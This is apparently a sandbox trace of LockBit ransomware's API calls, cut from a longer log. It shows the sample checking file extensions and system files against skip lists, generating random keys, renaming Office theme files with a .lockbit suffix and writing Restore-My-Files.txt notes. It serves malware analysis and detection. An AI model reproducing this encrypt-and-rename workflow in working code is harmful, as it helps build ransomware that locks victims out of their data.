[0190.209] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0190.209] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0190.209] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0190.209] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0190.209] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0190.209] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0190.209] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Horizon.thmx") returned 1 [0190.209] lstrcmpiW (lpString1="ntldr", lpString2="Horizon.thmx") returned 1 [0190.209] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Horizon.thmx") returned 1 [0190.209] lstrcmpiW (lpString1="bootsect.bak", lpString2="Horizon.thmx") returned -1 [0190.209] lstrcmpiW (lpString1="autorun.inf", lpString2="Horizon.thmx") returned -1 [0190.209] lstrcmpiW (lpString1="thumbs.db", lpString2="Horizon.thmx") returned 1 [0190.209] lstrcmpiW (lpString1="iconcache.db", lpString2="Horizon.thmx") returned 1 [0190.209] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0190.209] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Horizon.thmx") returned=".thmx" [0190.209] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0190.209] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0190.209] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0190.209] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0190.209] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0190.209] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0190.209] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0190.209] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0190.209] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0190.210] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0190.210] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0190.210] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0190.210] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0190.210] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0190.210] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0190.210] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0190.210] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0190.210] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0190.210] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0190.210] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0190.210] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0190.210] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0190.210] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0190.210] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0190.210] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0190.210] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0190.210] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0190.210] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0190.210] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Horizon.thmx.lockbit") returned 74 [0190.211] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Horizon.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\horizon.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0190.213] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0190.213] malloc (_Size=0x40068) returned 0x3df0008 [0190.214] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=245451) returned 1 [0190.214] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.214] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.214] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0190.214] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.215] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.215] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0190.215] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0190.221] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Horizon.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Horizon.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.221] malloc (_Size=0xaa) returned 0x1fa2ed8 [0190.221] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xaa, FileInformationClass=0xa) returned 0x0 [0190.229] free (_Block=0x1fa2ed8) [0190.229] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Horizon.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0190.229] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0190.229] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0190.229] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x157d6500, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5b584a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x157d6500, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x146a7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Median.thmx", cAlternateFileName="MEDIAN~1.THM")) returned 1 [0190.229] lstrcmpiW (lpString1=".", lpString2="Median.thmx") returned -1 [0190.229] lstrcmpiW (lpString1="..", lpString2="Median.thmx") returned -1 [0190.229] PathFindExtensionW (pszPath="Median.thmx") returned=".thmx" [0190.230] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0190.230] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0190.230] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0190.230] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0190.230] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0190.230] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0190.230] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0190.230] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0190.230] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0190.230] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0190.230] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0190.230] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0190.230] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0190.230] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0190.230] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0190.230] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0190.230] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0190.230] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0190.230] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0190.231] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0190.231] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0190.231] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0190.231] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0190.231] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0190.231] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0190.231] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0190.231] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0190.231] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0190.231] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0190.231] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0190.231] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0190.231] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0190.231] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0190.231] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0190.231] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0190.231] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0190.231] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0190.231] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0190.231] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0190.232] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0190.232] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0190.232] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0190.232] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0190.232] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0190.232] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0190.232] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0190.232] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0190.232] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Median.thmx") returned 1 [0190.232] lstrcmpiW (lpString1="ntldr", lpString2="Median.thmx") returned 1 [0190.232] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Median.thmx") returned 1 [0190.232] lstrcmpiW (lpString1="bootsect.bak", lpString2="Median.thmx") returned -1 [0190.232] lstrcmpiW (lpString1="autorun.inf", lpString2="Median.thmx") returned -1 [0190.232] lstrcmpiW (lpString1="thumbs.db", lpString2="Median.thmx") returned 1 [0190.232] lstrcmpiW (lpString1="iconcache.db", lpString2="Median.thmx") returned -1 [0190.232] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0190.232] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Median.thmx") returned=".thmx" [0190.233] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0190.233] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0190.233] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0190.233] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0190.233] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0190.233] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0190.233] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0190.233] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0190.233] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0190.233] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0190.233] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0190.233] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0190.233] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0190.233] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0190.233] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0190.233] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0190.233] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0190.234] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0190.234] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0190.234] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0190.234] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0190.234] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0190.234] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0190.234] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0190.234] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0190.234] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0190.234] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0190.234] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0190.234] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Median.thmx.lockbit") returned 73 [0190.234] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Median.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\median.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0190.238] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0190.238] malloc (_Size=0x40068) returned 0x3df0008 [0190.238] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=83623) returned 1 [0190.238] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.239] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.239] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0190.239] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.239] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.239] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0190.240] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0190.242] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Median.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Median.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.242] malloc (_Size=0xa8) returned 0x1fa2ed8 [0190.242] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xa8, FileInformationClass=0xa) returned 0x0 [0190.243] free (_Block=0x1fa2ed8) [0190.243] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Median.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0190.243] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0190.243] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0190.244] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1910ec00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5b7e600, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x1910ec00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x13af1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Metro.thmx", cAlternateFileName="METRO~1.THM")) returned 1 [0190.246] lstrcmpiW (lpString1=".", lpString2="Metro.thmx") returned -1 [0190.246] lstrcmpiW (lpString1="..", lpString2="Metro.thmx") returned -1 [0190.246] PathFindExtensionW (pszPath="Metro.thmx") returned=".thmx" [0190.246] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0190.246] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0190.246] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0190.246] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0190.246] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0190.246] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0190.246] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0190.246] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0190.246] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0190.246] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0190.246] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0190.246] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0190.246] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0190.246] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0190.246] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0190.246] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0190.246] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0190.246] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0190.246] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0190.247] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0190.247] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0190.247] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0190.247] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0190.247] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0190.247] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0190.247] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0190.247] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0190.247] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0190.247] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0190.247] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0190.247] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0190.247] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0190.247] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0190.247] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0190.247] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0190.247] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0190.247] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0190.247] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0190.247] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0190.247] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0190.247] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0190.247] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0190.248] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0190.248] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0190.248] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0190.248] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0190.248] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0190.248] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Metro.thmx") returned 1 [0190.248] lstrcmpiW (lpString1="ntldr", lpString2="Metro.thmx") returned 1 [0190.248] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Metro.thmx") returned 1 [0190.248] lstrcmpiW (lpString1="bootsect.bak", lpString2="Metro.thmx") returned -1 [0190.248] lstrcmpiW (lpString1="autorun.inf", lpString2="Metro.thmx") returned -1 [0190.248] lstrcmpiW (lpString1="thumbs.db", lpString2="Metro.thmx") returned 1 [0190.248] lstrcmpiW (lpString1="iconcache.db", lpString2="Metro.thmx") returned -1 [0190.248] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0190.248] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Metro.thmx") returned=".thmx" [0190.248] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0190.248] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0190.248] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0190.248] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0190.248] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0190.248] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0190.248] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0190.248] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0190.249] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0190.249] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0190.249] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0190.249] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0190.249] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0190.249] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0190.249] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0190.249] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0190.249] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0190.249] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0190.249] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0190.249] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0190.249] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0190.249] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0190.249] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0190.249] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0190.249] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0190.249] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0190.249] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0190.249] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0190.249] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Metro.thmx.lockbit") returned 72 [0190.249] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Metro.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\metro.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0190.259] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0190.259] malloc (_Size=0x40068) returned 0x3df0008 [0190.259] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=80625) returned 1 [0190.259] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.259] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.259] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0190.259] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.260] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.260] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0190.260] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0190.262] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Metro.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Metro.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.262] malloc (_Size=0xa6) returned 0x1fa2ed8 [0190.263] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0190.264] free (_Block=0x1fa2ed8) [0190.264] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Metro.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0190.264] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0190.264] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0190.264] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b734600, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5b7e600, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x1b734600, 